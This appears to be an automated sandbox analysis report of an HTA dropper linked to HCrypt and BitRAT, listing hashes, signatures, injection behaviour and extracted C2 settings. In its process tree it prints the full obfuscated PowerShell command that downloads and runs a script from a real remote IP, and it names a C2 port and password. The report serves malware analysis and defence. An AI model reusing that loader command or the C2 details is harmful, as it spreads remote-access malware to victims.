Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
20-01-2022 14:32
Static task
static1
Behavioral task
behavioral1
Sample
135.148.74.241_HCrypt/PS1.hta
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
135.148.74.241_HCrypt/PS1.hta
Resource
win10v2004-en-20220112
Behavioral task
behavioral3
Sample
135.148.74.241_HCrypt/new/ExeToHta.txt.html
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
135.148.74.241_HCrypt/new/ExeToHta.txt.html
Resource
win10v2004-en-20220112
General
-
Target
135.148.74.241_HCrypt/PS1.hta
-
Size
3KB
-
MD5
37f9dc388fedc16b308acaadc34c2054
-
SHA1
25c936c0b399b82ad39363f6237fd5db13369bda
-
SHA256
f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3
-
SHA512
f7a335e8b559079ea7b8d8d9341f0d13e3b7c23af4858d87f350df698f2580e83a7c3e84a69cdb003f83b68127a45943cfbb5cd11c44cc3a8446fb30ace85fc4
Malware Config
Extracted
http://135.148.74.241/PS1_B.txt
Extracted
bitrat
1.38
135.148.74.241:8080
-
communication_password
f1c1592588411002af340cbaedd6fc33
-
tor_process
tor
Signatures
-
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
suricata: ET MALWARE Observed Malicious SSL Cert (BitRAT CnC)
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 23 3744 powershell.exe 45 3744 powershell.exe -
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule behavioral2/memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
aspnet_compiler.exepid process 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3744 set thread context of 1408 3744 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3744 powershell.exe 3744 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 3744 powershell.exe Token: SeShutdownPrivilege 1408 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
aspnet_compiler.exepid process 1408 aspnet_compiler.exe 1408 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
mshta.exepowershell.exedescription pid process target process PID 3432 wrote to memory of 3744 3432 mshta.exe powershell.exe PID 3432 wrote to memory of 3744 3432 mshta.exe powershell.exe PID 3432 wrote to memory of 3744 3432 mshta.exe powershell.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe PID 3744 wrote to memory of 1408 3744 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe aed221520e0f14fb3027394fae42bfb3 C25sboTFCk+5gsrP8JQ7OQ.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1408-146-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1408-149-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/1408-147-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/3744-140-0x00000000068C5000-0x00000000068C7000-memory.dmpFilesize
8KB
-
memory/3744-142-0x00000000080A0000-0x00000000080BA000-memory.dmpFilesize
104KB
-
memory/3744-137-0x0000000006E80000-0x0000000006EE6000-memory.dmpFilesize
408KB
-
memory/3744-138-0x0000000007530000-0x0000000007596000-memory.dmpFilesize
408KB
-
memory/3744-139-0x0000000007A00000-0x0000000007A1E000-memory.dmpFilesize
120KB
-
memory/3744-132-0x0000000004250000-0x0000000004286000-memory.dmpFilesize
216KB
-
memory/3744-141-0x00000000091B0000-0x000000000982A000-memory.dmpFilesize
6.5MB
-
memory/3744-136-0x0000000006CB0000-0x0000000006CD2000-memory.dmpFilesize
136KB
-
memory/3744-143-0x0000000009010000-0x00000000090A6000-memory.dmpFilesize
600KB
-
memory/3744-144-0x0000000008FA0000-0x0000000008FC2000-memory.dmpFilesize
136KB
-
memory/3744-145-0x0000000009DE0000-0x000000000A384000-memory.dmpFilesize
5.6MB
-
memory/3744-135-0x00000000068C2000-0x00000000068C3000-memory.dmpFilesize
4KB
-
memory/3744-134-0x0000000006F00000-0x0000000007528000-memory.dmpFilesize
6.2MB
-
memory/3744-133-0x00000000068C0000-0x00000000068C1000-memory.dmpFilesize
4KB